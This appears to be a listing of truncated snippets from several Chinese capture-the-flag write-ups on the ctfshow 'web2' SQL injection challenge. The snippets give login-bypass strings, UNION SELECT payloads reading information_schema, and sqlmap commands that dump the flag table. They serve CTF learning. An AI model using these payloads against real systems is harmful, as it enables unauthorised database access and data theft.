保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlmap.py -r test.txt -D web2 --tables 查看字段 python2 sqlmap.py -r test.txt -D web2 -T flag --columns 查询字段内容 python2 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump 成...
使用 联合查询找到回显位置 发现回显位置在2的位置 构造语句查询数据库 1'union select 1,database(),3# 得到数据库名为 web2 查表,构造语句 1'union select null,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3# 或者1'union select null,(select group_c...
1' union select 1,2,3# 发现ctfshow变化了 那么接下来我们就可以直接获取数据库名称 1' union select 1,concat('--',(select database())),3# 是web2 接下来查web2下的表有哪些 1' union select 1,concat('--',(select table_name from information_schema.tables where table_schema='web2' limit...
由上可知可知有三列,接下来查找回显位置。 admin' or '1'='1' union select 1,2,3# 由上可知:回显位为2所在位置 爆库:admin' or 1=1 union select 1,database(),3#可知数据库名为web2 爆表:admin' or '1'='1' union select 1,group_concat(table_name),3 from information_schema.tables wher...
ctfshow web2 一道sql注入题 进去输入万能密码试一下啊 用户名:admin' or 1=1# 密码随便填一个就可以了 显示成功 说明可以sql注入 admin' or 1=1 union order by 1# 测试列数量 admin' or 1=1 union select 1,2,3# 测试回显位置 admin' or 1=1 union select 1,group_concat(schema_name),3 from...
ctfshow web web2 打开容器,发现一个登陆框 输入admin 密码随便输入,用burp抓包,发送到Repeater模块 首先试试万能密码:’or 1=1# username=admin'or 1=1#&password=123 发现登陆成功 接着查看回显位置:username=admin'or 1=1 union select 1,2,3#&password=123...
第四步我们开始爆数据库web2里面的表名: sql 1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'# 这里我们爆出两个表名:flag和user 这里我们就可以知道我们要的flag应该是在flag表中: ...
ctfshow-web2(SQL注入) 打开题目链接,是一个登录框,尝试弱口令登录 没什么反应 尝试万能密码登录 页面发生了变化 并未登录进去,但是有回显,大概率是SQL注入了 这里尝试了很久,尝试过程就不写了,最终判断它的注入点在用户名,而不是密码,密码随便输,而且--+的注释不行,这里要用#来注释。
ctfshow web2 web3 ctfshow web2 1.手动注入题。先用万能密码admin' or 1=1%23,有回显 2.union select注入,2处有回显 3.依次查找数据库、表、字段 得到flag ctfshow web3 http://input伪协议 1.提示了要用?url注入,所以用?url=php://input传入伪协议,作用是执行POST传入的代码 ...
ctf.show 萌新模块 web2关,此关卡使用intval()函数强制将参数转换成数值型,可以使用字符绕过,配合特殊符号控制SQL的查询结果,从而获取flag,这一关过滤了or,我们可以使用加号,减号,乘号,除号,或,左移等方式绕过 页面中给出了源码,并提示我们 id=1000时,即可获取flag ...